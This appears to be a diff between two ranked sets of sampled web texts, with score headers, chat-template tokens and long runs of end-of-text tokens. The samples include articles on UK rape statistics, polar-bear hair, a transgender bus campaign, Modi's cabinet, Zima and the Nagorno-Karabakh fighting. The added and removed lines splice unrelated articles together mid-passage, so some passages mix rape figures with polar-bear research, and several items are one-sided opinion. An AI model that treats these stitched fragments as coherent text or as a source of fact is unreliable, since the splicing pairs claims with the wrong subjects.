Only 17% of rapists are strangers to their victim. Just 4% are cases of date rape. Half (54%) are committed by a husband, partner or ex-partner. What's more, even though their experience is technically rape in law, 57% of rape victims don't necessarily think of themselves that way. -The studies -- the latest in a series on the same subject by the same group of Chinese researchers -- are not mere academic exercises. +To be clear what the figures categorise as rape, the definition is this: "the penetration of the vagina or anus without consent and penetration of the mouth by a penis without consent." -Understanding the structure and workings of polar-bear hairs "may find many potential applications in the future, especially in thermal insulation designs for extreme cases," said an earlier study by some of the same authors, published in 2011 in Thermal Science. +Since the 39,000 people who have taken part in the studies benefited nothing from alleging rape, and the results appear consistent, it seems probable that the research gives a realistic sense of the scale. -They note in their studies that polar bears maintain body temperatures of 98.6 degrees in an environment where temperatures can dip as low as minus 76 degrees. +If one looks at the data on rape at any point during adult life, it suggests 700,000 women have suffered in that way - equivalent to the entire population of Leeds. -The Chinese researchers are not alone in looking to polar-bear hair as a model for future heat-collecting and heat-holding products.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 65; Score = 284672.0 -<|begin_of_text|>This same bus was seen running through the streets of Madrid with its blunter message that “boys have penises and girls have vaginas. Don’t be deceived”This advertisement for intolerance, which belies intelligence on this subject is now in Manhattan parked in front of the UN building and says something slightly different in English:“Its biology…Boys are boys and always will be and girls are girls and always will be. You can’t change sex. Respect all”Never mind that message is written by people who understand nothing and most importantly are confusing gender identity with sexual organs and I won’t surprise you by telling you it has been funded by 3 right wing conservative groups one of whom is called the National Organization for Marriage.Of the Spanish version, one Madrid councilman declared it the “bus of shame,” and city officials ordered it removed from the streets for violating a traffic law restricting advertising on private vehicles.“We need a discussion about how to respect everyone,” says Joseph Grabowski who is a representative for one of the groups. But he also claimed that being transgender is a “disorder” and that a respectful discussion does not extend to recognizing a transgender person’s gender identity in public settings. (The American Psychiatric Association does not classify being transgender as a mental disorder.) He also added, “They can live that out privately.”Not only are these groups profoundly ignorant of science and reality but they also represent a dangerous new backlash trend among the “earth is flat crowd”; the very same ones that occupy the Bible belt in the United States and voted for Donald Trump. They can also be found in every country in the world usually also denying climate change, women’s rights and decrying homosexuality as a sin.Let’s hope that their message does not receive a receptive ear and enough people take exception in order to educate the sponsors although I suspect that wouldn’t have much effect on those who've already drunk the Kool-Aid.Is it not the least bit ironic that the "respect all" in their message doesn't ring a bell of contradiction in their minds?<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Figures for ================================================================================ -Rank = 66; Score = 284672.0 -<|begin_of_text|>Modi is the King now. Don’t be surprised. He holds the title of the Prime Minister. But he wields so much unbridled power that he is virtually no less than a king. Modi has always had the dream to have power that none could question him. Indeed, the Cabinet reshuffle on Sunday has put him in a position where no one can even raise a finger in Modi’s presence. He no longer shares power with anybody in his council of ministers. Rather he himself is the source of power for his ministers. - -Power sharing is the basic principle of the parliamentary system of governance wherein the Prime Minister and his council of ministers take a decision with consensus. A Prime Minister is therefore called the first among equals in the parliamentary system which India has adopted right from its inception as a free nation. - -This system ensures check upon a Prime Minister from turning an autocrat because ministers act upon him/her as a balancing force. They work in the interest of the region they represent. This, in turn, puts a democratic pressure on a Prime Minister while taking a decision. +Rank = 65; Score = 131072.0 +<|begin_of_text|>Two guys walk into a bar. They order beers. Bartender says they don’t have any beer. The men look confused. A stranger in a stylish hat suggests they try something different. They order a clear malt beverage. It’s on ice, clear, delicious. The men are happy. -But Modi is not the one to bear any restrictions when it comes to exercising power. He is temperamentally an autocrat. He is essentially a narcissist who is deeply impressed with himself. He not just believes himself to be destined to change the destiny of ‘1.5 billion Indians’. But he is also convinced that he alone can serve the country the best. This pattern of thinking is very much anti-democratic and such charecters always transform into an autocrat. +The entire ad spot lasts 30 seconds, or roughly the same amount of time Zima could claim to be among the most popular adult beverages in the country. -Narendra Modi has often said about himself that he left his “family for the country”. The country is supreme for him and even over and above his own family. It is also the RSS belief. No RSS functionary can have a family. Modi was so impressed with the RSS that he left behind his bride and never went back to his family. He ‘devoted’ his life to the country, as he himself claims. +In 1991, with beer sales on the decline across the industry, the Coors company of Golden, Colorado decided to blend two of the hottest trends in consumer marketing: “clear” products like Crystal Pepsi and the smooth, gently-intoxicating appeal of wine coolers. By using charcoal to filter the color and taste from their brews, they were able to deliver a vaguely citrus-tasting drink with 4.7 percent alcohol content. The company asked third-party marketing firm Lexicon Branding to give it a name; Jane Espenson, who would later become a staff writer on Buffy the Vampire Slayer and Game of Thrones, dubbed it Zima, the Russian word for "winter." -So, Modi’s idea of India is based on the Sangh’s idea of the country which, in turn, is Hindu Rashtra. It very much reflects in Modi’s style of governance right from the Gujarat riots to mob lynching of minorities. A Hindu Rashtra is not feasible within a democratic system because in such a system, decision-making to be democratic. So, Modi’s worry was how to turn the system upside down to wield unbridled power to construct a “new India” of his ideas! +Armed with a $180 million budget for the 1994 launch, Coors peppered television with commercials featuring a spokesman who exchanged his s's for z's. (“What’s your zign?”) They also pushed a slew of merchandising and even an early consumer-use product website. -Modi ultimately found a way out through the Cabinet resh -================================================================================ -Rank = 67; Score = 284672.0 -<|begin_of_text|>Executive orders issued by Presidents of the United States to help officers and agencies of the executive branch manage operations within the government. +The goal was to get Zima on the minds and into the hands of young males. Owing to the blanket advertising assault, that's exactly what they accomplished. Zima sold a staggering 1.3 million barrels’ worth of product in 1994, giving it a near-instant 1 percent market share in the booze industry. It was estimated that 70 percent of all drinkers tried the “malternative." -At the federal level of government in the United States, laws are made almost exclusively by legislation. Such legislation originates as an Act of Congress passed by the United States Congress; such acts were either signed into law by the President or passed by Congress after a presidential veto. +As Coors would soon learn, those numbers only work in your favor if people like the product. The company was disappointed to learn that many of them didn’t: Men found the taste off-putting. And those who enjoyed it were precisely the demographic they were looking to avoid. -However, legislation is not the only source of regulations. There is also judge-made common law and constitutional law. The President can issue executive orders pursuant to a grant of discretion from Congress, or under the inherent powers that office holds to deal with certain matters which have the force of law. +Women who normally passed over beer embraced Zima, giving it an effete quality that marketing considered to be grim death for the valued male customer base. If a man couldn’t feel manly taking a pull of the clear stuff, he'd be likely to reach for something else. -Many early executive orders were not recorded. The State Department began numbering executive orders in the early 20th century, starting retroactively from President Abraham Lincoln's Executive Order Establishing a Provisional Court in Louisiana issued in 1862.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +On the public relations side, Coors was also having to defend itself against charges that teenagers were growing fond ================================================================================ -Rank = 68; Score = 282624.0 -<|begin_of_text|>HP's IaaS/PaaS Helion Public venture turns private. Microsoft, with its burgeoning Azure Cloud, announces serious container substrate in the form of its Nano Server, Docker compatibility and additional equivalents. +Rank = 66; Score = 131072.0 +<|begin_of_text|>In Armenia, they are called heroes; in Azerbaijan, martyrs. One lived in a stone house with a dirt floor and no roof; the other in a mud hut with a dirt floor and a tarpaulin roof. -Helion, Helioff. It's not as bad as that at all, but the effort made to compete with AWS is over, for now. HP is backing away from the pubic cloud and going for perhaps a safer, and more lucrative, future in the private cloud. It's my guess that inevitably, HP will make a better return on assets this way. The changes will be frustrating to planners, perhaps, but the cloud-on-the-hoof turf war is largely over. +While the opposing forces hold seemingly irreconcilable positions on Karabakh’s fate, most of the soldiers who died in action during Armenia and Azerbaijan’s April 2-6 conflict had a common trait – they came from socially vulnerable families. -Face it: It's brutal out there. Commodity infrastructure portends that margins will be slim. Amazon knows know to make microprofits. HP is a machine that needs more revenue per SKU. There's nothing like not making money and making up for it in volume. HP's Helion isn't dead by any means, rather, it's becoming focused infrastructure, in my opinion. +Long frustrated by alleged corruption within their respective armies, that fact agitates many ordinary Armenians and Azerbaijanis. Military service in both countries is obligatory for males once they turn 18. Most Armenians serve for two years; Azerbaijanis for 18 months. -[ Now read 20 hot jobs ambitious IT pros should shoot for. ] +Online and offline, a major complaint heard in both countries is the same – soldiers without influential connections or the ability to pay bribes are the ones who bear the brunt of combat. The sons of the wealthy or government officials are believed to be shielded from dangerous assignments. -You could smell the scent in the breeze. HP buys Eucalyptus, an AWS-enabler. Serial entrepreneur Marten Mickos, of MySQL and Eucalyptus fame, goes on comparative waivers. Amazon chugs along. Rackspace was rumored to be for sale, something I find hard to believe (in fact, the company said in September that "it has ended its evaluation of alternatives that would result in Rackspace being acquired" and was planning to go forward independently). OpenStack languishes because it's too tough for many people to get their heads around. The market size seems smaller than everyone had dreamed. +There is only anecdotal evidence to back this impression. Given the natural sensitivities about security, information on the deployment of individuals and units is not publically available. Meanwhile, casualty lists that indicate slain soldiers’ ages, names and hometowns are released in Armenia, but not in Azerbaijan. -But these are infrastructure ploys. Unless you're an expert at microprofits, you can be toasted, quickly, at high rates of speed. Microsoft dropped its traditional pre-announcement of an ought-to-be-available in a hoped-for future release, Docker on Windows, and their own competitor to skinny operating systems, the Windows 2016 Nano Server, a seemingly impossible sort of substrate for the new rage of containers. +Nonetheless, the general public still suspects discrimination in assignments. And with cause, some analysts and activists believe. -Why impossible? Since when has Microsoft made a skinny operating system? Maybe long ago, as Xenix. Sure, you can get non-GUI flavors of Microsoft servers, seemingly surgically deployed as 2008/2012 Rsomething, with but a handful of the fatuous menu of pulled-from-retirement API sets, and given character to -================================================================================ -Rank = 69; Score = 282624.0 -<|begin_of_text|>What does the word "rape" mean to you? For many reading this post, I suspect, it is a trigger to appalling events in their own lives. Because rape is an everyday crime. By my calculations, roughly 230 people are raped each day in England and Wales. - -Police, this morning, called for specialist units to investigate rape allegations - senior officers are ashamed of a conviction rate they calculate at 6%. "Not good enough" says the Assistant Commissioner of the Metropolitan Police John Yates. +Lists of the 97 Armenian and Karabakhi soldiers killed did not include the names of men known to be the sons of senior officials or wealthy businessmen, noted Armenian human-rights activist Artur Sakunts, head of the Vanadzor office of the Helsinki Citizens’ Assembly, which works with military abuse cases, and Edgar Khachatrian, the head of Peace Dialogue, which also deals with soldiers’ rights. -But analysis of the Home Office data on what they call "intimate violence" suggests the conviction rate is much lower. And the scale of the problem far greater. My source is the Home Office supplement to the British Crime Survey - Homicides, Firearm Offences and Intimate Violence 2006/07 (pdf link). This is a remarkable piece of research in which 13,000 people were asked to fill out an anonymous questionnaire on their experiences of domestic violence, sexual assault and rape. +The Armenian Defense Ministry has refused to release demographic information about its conscript-based army, Sakunts added. -It is an exercise that has been conducted three times now and is backed up by other academic studies. The results are consistent. One in 20 women said they had been raped since they were 16. One in 200 said they had been raped in the previous 12 months. In terms of the population of England and Wales, that suggests 85,000 women are raped each year - 230 a day. And yet the number of men convicted of rape is fewer than 800 a year. So the chance of a victim seeing her attacker jailed is less than one in 100. +“On the grounds of confidentiality, there is no such mechanism to be able to control or find out how many children of state officials serve, who serves where, and so forth,” said Khachatrian. “But the study of fatalities shows that not a single official’s son died. According to our information, no son of an official serves on the frontline.” -But rape is a complex crime. Only 17% of rapists are strangers to their victim. Just 4% are cases of date rape. Half (54%) are committed by a husband, partner or ex-partner. What's more, even though their experience is technically rape in law, 57% of rape victims don't necessarily think of themselves that way. +Nor did sons of privilege seemingly feature in the official list of 31 Azerbaijani soldiers killed in combat. (Independent estimates put the number up to roughly three times higher.) -To be clear what the figures categorise as rape, the definition is this: "the penetration of the vagina or anus without consent and penetration of the mouth by a penis without consent." +“Pictures, interviews with soldiers’ families show their social condition clearly,” said +================================================================================ +Rank = 67; Score = 130560.0 +<|begin_of_text|>Fatherhood is wasted on dads. There has not been a moment – not a single fleeting moment of my entire poxy life – when I’ve had this much female interest. I’d always been useless with girls, but now they flock to me. I may as well be a Beatle. One of the good-looking Beatles, too. Not even Ringo. This is unprecedented. -Since the 39,000 people who have taken part in the studies benefited nothing from alleging rape, and the results appear consistent, it seems probable that the research gives a realistic sense of the scale. +What’s the cause of this sudden attractiveness? Is it my charismatic new thousand-yard stare? Are these vomit stains making my eyes pop? Hardly. It’s him. -If one looks at the data on rape at any point during adult life, it suggests 700,000 women have suffered in that way - equivalent to the entire population of Leeds. +I had no idea that people went so crazy for babies. In my pre-fatherhood days, a baby was something to endure through gritted teeth because it was about to ruin your flight. I thought that was universal. But no. Take a baby outside in a sling and well-wishers will swarm around you. I’ve even amassed a small arsenal of stock answers, such has been the barrage of genuine affection for him. A boy. Almost two months. About 10lb. He has his mum’s eyes. No, he’s not normally this quiet. Bright yellow, smells awful, thanks for asking. -Figures for -================================================================================ -Rank = 70; Score = 282624.0 -<|begin_of_text|>Good food, good eating, is all about blood and organs, cruelty and decay. It’s about sodium-loaded pork fat, stinky triple-cream cheeses, the tender thymus glands and distended livers of young animals. It’s about danger—risking the dark, bacterial forces of beef, chicken, cheese, and shellfish. Your first two hundred and seven Wellfleet oysters may transport you to a state of rapture, but your two hundred and eighth may send you to bed with the sweats, chills, and vomits. Gastronomy is the science of pain. Professional cooks belong to a secret society whose ancient rituals derive from the principles of stoicism in the face of humiliation, injury, fatigue, and the threat of illness. The members of a tight, well-greased kitchen staff are a lot like a submarine crew. Confined for most of their waking hours in hot, airless spaces, and ruled by despotic leaders, they often acquire the characteristics of the poor saps who were press-ganged into the royal navies of Napoleonic times—superstition, a contempt for outsiders, and a loyalty to no flag but their own. A good deal has changed since Orwell’s memoir of the months he spent as a dishwasher in “Down and Out in Paris and London.” Gas ranges and exhaust fans have gone a long way toward increasing the life span of the working culinarian. Nowadays, most aspiring cooks come into the business because they want to: they have chosen this life, studied for it. Today’s top chefs are like star athletes. They bounce from kitchen to kitchen—free agents in search of more money, more acclaim. I’ve been a chef in New York for more than ten years, and, for the decade before that, a dishwasher, a prep drone, a line cook, and a sous-chef. I came into the business when cooks still smoked on the line and wore headbands. A few years ago, I wasn’t surprised to hear rumors of a study of the nation’s prison population which reportedly found that the leading civilian occupation among inmates before they were put behind bars was “cook.” As most of us in the restaurant business know, there is a powerful strain of criminality in the industry, ranging from the dope-dealing busboy with beeper and cell phone to the restaurant owner who has two sets of accounting books. In fact, it was the unsavory side of professional cooking that attracted me to it in the first place. In -================================================================================ -Rank = 71; Score = 282624.0 -<|begin_of_text|>Being feminist means being vegan. You can’t be a true feminist if you’re eating meat. +Incidentally, this sling has been incredible. Put a baby in a sling and not only will it automatically go to sleep, but you also get to use both your arms again. Last weekend, because motherhood had transformed the back of her head into a nightmarish mishmash between a dreadlock and a rat king, my wife went for a haircut. It was the longest amount of time I’d ever had to spend alone with my son without the safety net of an emergency handover, and it was making me slightly antsy. -I read this comment on Facebook and it hit a nerve with me. My first reaction was, “Why should people be telling others what to eat and what not to eat?” The more I thought about it, the more it bothered me for many reasons. +However, once I’d put him in a sling, I could do anything. I was able to wash up, bake a cake, wash up again and complete the really hard Assassin’s Creed side-mission where you have to rescue the prostitutes, all by the time she came back. This newfound explosion of productivity was amazing. I felt like the star of a tampon advert, ready to go skydiving or white-water rafting just because I could. In summary: hooray for slings. -The argument is that being a feminist means addressing all forms of oppression, including oppression of animals. The animal agricultural industry exploits animals. Female animals are forced to breed through artificial or manual insemination. Their youngs are taken from them prematurely. Female chickens are debeaked and grow to be too big for their legs to carry them. Pigs are penned in cages too small for them to move. The theory is that exploitation of the female animal reproductive system is very relevant to feminists fighting against the patriarchy and fighting for human female reproductive rights. Oppression of animals should intersect with oppression of women. +Having the baby out in public has only helped to reinforce what an unbearable stereotype of a proud dad I’m becoming. All I ever want to do is hang out with my family, preferably with my boy sleeping on me. When that’s not happening, I miss it. I miss the weight and warmth of him, +================================================================================ +Rank = 68; Score = 130560.0 +<|begin_of_text|>Gunshots heard and clashes seen at Jerusalem's al-Aqsa mosque on Friday when Israeli forces stormed the compound. (Saeed Qaq) -When vegans or feminists make statements like mentioned above, it can come off as very Western-centric, classist, and elitist. +Clashes erupted in Jerusalem at the al-Aqsa mosque, known as the third-holiest site in Islam. -I’ve never felt like going vegan or vegetarian, not because I didn’t understand the plight for animal rights, but because it is something I can’t identify with. +Dozens gathered outside the mosque to protest Israel's ground invasion into Gaza, according to the International Business Times. Protesters then clashed with Israel Defense Forces after Friday prayers. -First and most importantly, Hmong culture is a very big part of my identity, and food is Hmong culture. We (family and friends) gather around food. Food is served at birthday parties, religious ceremonies, celebrations, and even during short visits to family. Food is part of family life. +According to Israel Police spokesman Micky Rosenfeld, following Friday prayers at the mosque compound, about 200 to 300 masked youths caused disturbances by throwing stones at policemen stationed nearby. After 20 minutes of disturbances, police entered the compound and arrested seven people for rioting. -So, why not substitute meat ingredients with vegan products? +"We had been notified in advance that this was planned," said Rosenfeld, adding that Israel had imposed an age limit on people who could enter the compound, which Jews refer to as the Temple Mount and which Muslims call Haram al-Sharif, or holy sanctuary. Only men over age 50 and women were allowed in to pray on Friday, but Rosenfeld said that younger men had spent the night at the compound in preparation for the riots on Friday. -Our ancestors cultivated the lands of Laos, Vietnam, and China for farming and livestock. We brought our culture with us when we immigrated to the US as refugees of war after the Vietnam War. +According to reports, 100 Israelis stormed the courtyard and used rubber bullets to disperse crowds. -Religious ceremonies, like hu plig (soul calling), require eggs and the sacrifice of chickens and roosters. Other ceremonies involve sacrificial cows, pigs, and sheep/goats. We need chicken’s blood and feathers for the New Year to create a new shrine for our xwm kab. So, how should we perform or practice our religion if we go vegan? What about the cultural custom of dieting only on boiled chicken and herbs 30 days postpartum? +RELATED: -Meat has always been very precious to the Hmong. We don’t waste anything, so the dishes we cook during feasts are from the meat of the animals we sacrifice for religious ceremonies. Food we eat throughout the year are leftover meat from the same animals. +Live blog: Israel continues to invade Gaza -V +Israel prepares to broaden Gaza offensive<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 72; Score = 282624.0 -<|begin_of_text|>Pipelines leak. It’s what they do. And the Dakota Access pipeline will be no exception. - -The 1,168 mile-long pipeline is intended to transport crude oil from the Bakken oil fields in North Dakota to Patoka, Illinois, passing through South Dakota and Iowa. From there, it will connect with another pipeline to transfer oil to terminals and refineries along the Gulf of México. - -However, its construction has hit a snag in Standing Rock, North Dakota. Since September the Standing Rock Sioux Tribe and allies from around the world have been pushing hard to prevent the pipeline from cutting through Sioux Treaty territory. +Rank = 69; Score = 130560.0 +<|begin_of_text|>Migrant workers offend Republicans by being productive members of society. (Zenpix/Dreamstime.com) -The water protectors maintain–under enormous pressure from the government—that construction of the pipeline must be halted immediately to protect the waters of the Missouri River and “the very survival” of the tribe. +Migrant workers offend Republicans by being productive members of society. (Zenpix/Dreamstime.com) -The pipeline will cross under the Missouri River, the longest river in the United States and the sole water source of the Standing Rock Sioux Tribe. +Tomato farmer Wayne Smith said he has never been able to keep a staff of American workers in his 25 years of farming. “People in Alabama are not going to do this,” said Smith, who grows about 75 acres of tomatoes in the northeast part of the state. “They’d work one day and then just wouldn’t show up again.” At his farm, field workers get $2 for every 25-pound box of tomatoes they fill. Skilled pickers can make anywhere from $200 to $300 a day, he said. -Pipeline ruptures happen all the time. It’s a fact. An excavator might dig in the wrong place. The pipeline might start leaking due to corrosion. It might explode due to poor operation. It could even break 